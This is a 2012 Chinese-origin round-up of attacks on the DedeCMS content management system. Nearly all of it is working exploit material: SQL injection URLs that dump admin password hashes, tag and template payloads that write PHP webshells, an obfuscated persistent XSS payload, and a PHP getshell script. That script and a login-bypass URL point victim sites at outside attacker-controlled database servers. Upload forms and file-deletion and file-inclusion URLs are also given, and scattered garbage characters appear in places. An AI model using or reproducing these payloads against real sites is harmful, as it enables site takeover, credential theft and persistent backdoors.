DedeCMS vulnerability round-up

Posted 2012-10-18 10:42:14

DedeCMS 5.6 rss.php SQL injection
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCMS v5.6 embedded malicious code execution
Register a member account, upload a piece of software, and in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
It executes as soon as the post is viewed or edited.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php, a one-line shell with password xiao.
DedeCMS 5.6 GBK SQL injection
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
DedeCMS (all versions) gotopage parameter XSS
1. Copy and paste the URL below into the browser. It triggers the XSS and installs the XSS "rootkit". Note that IE8/9 block URL-borne XSS, so disable the XSS filter first.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser. From now on, whichever of the URLs below you visit, our XSS fires.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DedeCMS (织梦) variable-override getshell
#!/usr/bin/php -w
<?php
// DedeCMS variable-override getshell via plus/mytag_js.php, as posted, cleaned up.
// The POST body overrides the cfg_db* settings through _COOKIE[GLOBALS][...], so
// mytag_js.php connects to the hard-coded attacker MySQL server below, whose
// dede_mytag row carries the {dede:php} payload that writes the shell.
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath=/data/cache   aid=2 shellpath=/   aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
// Getshell() returns only the first response line, so this effectively checks for "HTTP/1.1 200 OK".
if (strpos($exp,"OK")>12){
echo "Exploit Success \n";
if($aid==1)echo "Shell:".$url."/$path/data/cache/fuck.php\n";
if($aid==2)echo "Shell:".$url."/$path/fuck.php\n";
if($aid==3)echo "Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
// Form fields: doaction points back at mytag_js.php, the _COOKIE[GLOBALS][cfg_db*] fields
// replace the database settings, QuickSearchBtn is the GBK-encoded submit button.
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "No response from ".$host."\n";
return '';
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;  // first line only (the HTTP status line)
}
}
?>

DedeCMS v5.6-5.7 unauthorised access (straight into the admin back end)
http://www.ssvdb.com/[dede-admin-dir]/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Replace validate=dcug above with the current CAPTCHA value and you go straight into the site's admin back end.
Precondition: you must first obtain the admin directory path.

DedeCMS (织梦) tag remote file write
Precondition: you must have your own DedeCMS database ready, then insert the row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourself...
<!-- onsubmit hooks in addaction() so the form actually posts to the URL typed into doaction -->
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction()">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
DedeCMS <= V5.6 Final template execution
1. Register a user, enter the member area, publish an article and upload an image; then in attachment management replace the image with our crafted template. Say the image name is:
& t: |3 g' H; N! G; iuploads/userup/2/12OMX04-15A.jpg6 m# p& D$ n* k9 A9 q3 i6 Q

The template content is (prefix gif89a if the image format is checked):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and build a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>Edit article</strong></h3>
<div class="postForm">
<label>Title:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>Tags:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(comma separated)
<label>Author:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>Category:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test category</option>
</select> <span style="color:#F00">*</span>(coloured categories cannot be selected)
<label>My category:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>Summary:</label>
<textarea name="description" id="description">1111111</textarea>
(brief description of the content)
<label>Thumbnail:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<!-- the two crafted fields: templet points at the uploaded "image", dede_addonfields makes article_edit.php save it -->
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(crafted here)
</div>
<!-- form action area -->
<h3 class="meTitle">Body</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; target=&quot;_blank&quot;><img border=&quot;0&quot; alt=&quot;&quot; src=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; width=&quot;1010&quot; height=&quot;456&quot; /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>CAPTCHA:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="Can't read? Click to refresh" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">Submit</button>
<button class="button2 ml10" type="reset">Reset</button>
</div>
</div>
</form>

Submit; if it reports success, the template path has been changed.
3. Visit the edited article. Assuming the article's aid is 2, request:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DedeCMS website management system Get Shell (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit">Change</button>
</form>
Build the form above; after upload the image is stored as /uploads/userup/3/1.gif.
Publish an article, then build the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>aa</option>
</select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<!-- templet points at the uploaded "image"; dede_addonfields makes article_edit.php save that field -->
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">Submit</button>
</form>
DedeCMS (织梦) V5.6 remote file deletion
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

DedeCMS (织梦) V5.6 plus/carbuyaction.php local file inclusion
http://www.test.com/plus/carbuya ... urn&code=../../
! i# X; A5 M- k" g& Q) ^' h
5 z- y7 U1 |  a& Z/ V) ]! Z) _5 C) N6 J6 y% m2 t2 R
+ N* V2 F0 N1 D! S3 [% M6 x
8 l% L; O* [' o! u. W

3 v9 B& R+ b4 ]/ \7 j0 [
4 L. u1 K" b6 w6 f, D' B  l
3 s$ o+ T* c& `& V
# V8 K8 H& x* ]1 a* H6 X) T
) Q2 ~& [6 t2 L/ x6 t( n- O: z2 g% E5 p9 v6 S
Note on the plus/advancedsearch.php admin-table dump above: the stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, leaving 20 characters; drop 3 more from the front and 1 from the end and you have the 16-character MD5.

DedeCMS (织梦) 5.1 feedback_js.php injection
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
DedeCMS (织梦) select_soft_post.php uninitialised variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<!-- the cfg_* fields are picked up as uninitialised globals by select_soft_post.php (register_globals=on) -->
<form action="http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php" method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just an exploit for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game, get a webshell at /data/cache/fly.php...<br />
</body>
</html>
DedeCMS (织梦) 5.3 - 5.5 plus/digg_frame.php injection
It exploits a MySQL numeric-overflow error together with the fact that DedeCMS writes database error details into a PHP file whose header does no validation.
1. Visit:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is displayed.
2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following proves the injection worked.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Run test.html from dede.rar, noting that the form's action address is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
If after clicking OK you see the step-2 output, the backdoor file has been written.

DedeCMS (织梦) plus/infosearch.php file injection
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*